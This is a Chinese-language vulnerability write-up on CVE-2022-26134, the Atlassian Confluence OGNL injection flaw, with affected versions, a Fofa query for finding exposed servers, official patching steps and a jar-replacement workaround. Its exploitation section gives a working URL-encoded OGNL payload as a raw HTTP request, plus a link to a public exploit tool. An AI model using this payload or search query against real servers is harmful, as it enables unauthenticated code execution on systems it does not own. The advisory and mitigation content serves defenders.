CVE-2022-26134——Atlassian Confluence 远程代码执行

漏洞描述

近日，Atlassian官方发布了Confluence Server和Data Center OGNL 注入漏洞（CVE-2022-26134）的安全公告。该漏洞的CVSS评分为10分，目前漏洞细节与PoC已被公开披露，且被检测到存在在野利用。

Atlassian Confluence是Atlassian公司出品的专业wiki程序。攻击者可利用漏洞在未经身份验证的情况下，远程构造OGNL表达式进行注入，在Confluence Server或Data Center上执行任意代码。请相关用户尽快自检并采取措施进行防护。

影响范围

Atlassian Confluence Server and Data Center 用于团队成员之间的协作和知识共享，主要部署在内网，所以互联网上分布较少，主要集中在美国、德国和荷兰。

目前受影响的 Atlassian Confluence Server and Data Center 版本：

Atlassian Confluence Server and Data Center < 7.4.17

7.5.0 ≤ Atlassian Confluence Server and Data Center < 7.13.7

7.14.0 ≤ Atlassian Confluence Server and Data Center < 7.14.3

7.15.0 ≤ Atlassian Confluence Server and Data Center < 7.15.2

7.16.0 ≤ Atlassian Confluence Server and Data Center < 7.16.4

7.17.0 ≤ Atlassian Confluence Server and Data Center < 7.17.4

7.18.0 ≤ Atlassian Confluence Server and Data Center < 7.18.1

网络空间引擎搜索语法

Fofa搜索语法

app=”ATLASSIAN-Confluence”

漏洞利用

访问页面

payload

GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1
Host: your-ip:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close

手工利用

工具利用

工具地址：git clone https://github.com/crowsec-edtech/CVE-2022-26134

至此漏洞利用结束。

官方修复建议

当前官方已发布最新版本，建议受影响的用户及时更新升级到最新版本。链接如下：

https://www.atlassian.com/software/confluence/download-archives。

临时修复建议

如果在集群内运行 Confluence 则需要在每个节点上重复以下过程：

1.关闭 Confluence

2.下载https://packages.atlassian.com/maven-internal/opensymphony/xwork/1.0.3-atlassian-10/xwork-1.0.3-atlassian-10.jar

3.删除或者将 /confluence/WEB-INF/lib/xwork-1.0.3-atlassian-8.jar 移出 Confluence 安装目录

注：不要在目录中留下旧的 JAR 文件

4.将下载的 xwork-1.0.3-atlassian-10.jar 文件复制到 /confluence/WEB-INF/lib/ 目录中

5.检查新的 xwork-1.0.3-atlassian-10.jar 文件权限是否和所在目录的其他文件权限一致。

6.启动 Confluence

Confluence 7.0.0 - Confluence 7.14.2 的用户：

如果在集群内运行 Confluence 则需要在每个节点上重复以下过程：

1.关闭 Confluence

2.下载

https://packages.atlassian.com/maven-internal/opensymphony/xwork/1.0.3-atlassian-10/xwork-1.0.3-atlassian-10.jar

https://packages.atlassian.com/maven-internal/opensymphony/webwork/2.1.5-atlassian-4/webwork-2.1.5-atlassian-4.jar

https://confluence.atlassian.com/doc/files/1130377146/1137639562/3/1654274890463/CachedConfigurationProvider.class

3.删除或者将 /confluence/WEB-INF/lib/xwork-1.0.3.6.jar/confluence/WEB-INF/lib/webwork-2.1.5-atlassian-3.jar

移出 Confluence 安装目录

注：不要在目录中留下旧的 JAR 文件

4.将下载的 xwork-1.0.3-atlassian-10.jar 文件复制到 /confluence/WEB-INF/lib/ 目录中

5.将下载的 webwork-2.1.5-atlassian-4.jar 文件复制到 /confluence/WEB-INF/lib/ 目录中

6.检查两个新文件权限是否和所在目录的其他文件权限一致。

7.切换到目 录/confluence/WEB-INF/classes/com/atlassian/confluence/setup

a.创建一个名为的新目录 webwork

b.将 CachedConfigurationProvider.class 复制到/confluence/WEB-INF/classes/com/atlassian/confluence/setup/webwork

c.确保 CachedConfigurationProvider.class 文件和/confluence/WEB-INF/classes/com/atlassian/confluence/setup/webwork 目录权限正确

8.启动 Confluence

详细操作请参考官方：

https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html